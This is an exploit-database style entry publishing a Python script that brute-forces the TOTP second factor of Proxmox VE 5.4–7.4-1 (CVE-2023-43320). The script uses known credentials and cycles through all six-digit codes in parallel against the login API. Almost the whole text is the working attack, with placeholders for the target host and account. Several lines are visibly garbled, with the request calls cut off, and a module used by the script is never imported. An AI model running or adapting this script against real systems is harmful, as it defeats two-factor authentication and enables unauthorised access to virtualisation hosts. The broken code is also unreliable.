Proxmox VE 7.4-1 TOTP Brute Force

Credit: Gabe Rust
Risk: Low
Local: No
Remote: Yes

# Exploit Title: Proxmox VE TOTP Brute Force # Date: 09/23/2023 # Exploit Author: Cory Cline, Gabe Rust # Vendor Homepage: # Software Link: # Version: 5.4 - 7.4-1 # Tested on: Debian # CVE : CVE-2023-43320 import time import requests import urllib.parse import json import os import urllib3 urllib3.disable_warnings() threads=25 #################### REPLACE THESE VALUES ######################### password="KNOWN PASSWORD HERE" username="KNOWN USERNAME HERE" target_url="https://HOST:PORT" ################################################################## ticket="" ticket_username="" CSRFPreventionToken="" ticket_data={} auto_refresh_time = 20 # in minutes - 30 minutes before expiration last_refresh_time = 0 tokens = []; for num in range(0,1000000): tokens.append(str(num).zfill(6)) def refresh_ticket(target_url, username, password): global CSRFPreventionToken global ticket_username global ticket_data refresh_ticket_url = target_url + "/api2/extjs/access/ticket" refresh_ticket_cookies = {} refresh_ticket_headers = {} refresh_ticket_data = {"username": username, "password": password, "realm": "pve", "new-format": "1"} ticket_data_raw = urllib.parse.unquote(, headers=refresh_ticket_headers, cookies=refresh_ticket_cookies, data=refresh_ticket_data, verify=False).text) ticket_data = json.loads(ticket_data_raw) CSRFPreventionToken = ticket_data["data"]["CSRFPreventionToken"] ticket_username = ticket_data["data"]["username"] def attack(token): global last_refresh_time global auto_refresh_time global target_url global username global password global ticket_username global ticket_data if ( int(time.time()) > (last_refresh_time + (auto_refresh_time * 60)) ): refresh_ticket(target_url, username, password) last_refresh_time = int(time.time()) url = target_url + "/api2/extjs/access/ticket" cookies = {} headers = {"Csrfpreventiontoken": CSRFPreventionToken} stage_1_ticket = str(json.dumps(ticket_data["data"]["ticket"]))[1:-1] stage_2_ticket = stage_1_ticket.replace('\\"totp\\":', '\"totp\"%3A').replace('\\"recovery\\":', '\"recovery\"%3A') data = {"username": ticket_username, "tfa-challenge": stage_2_ticket, "password": "totp:" + str(token)} response =, headers=headers, cookies=cookies, data=data, verify=False) if(len(response.text) > 350): print(response.text) os._exit(1) while(1): refresh_ticket(target_url, username, password) last_refresh_time = int(time.time()) with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor: res = [executor.submit(attack, token) for token in tokens] concurrent.futures.wait(res)

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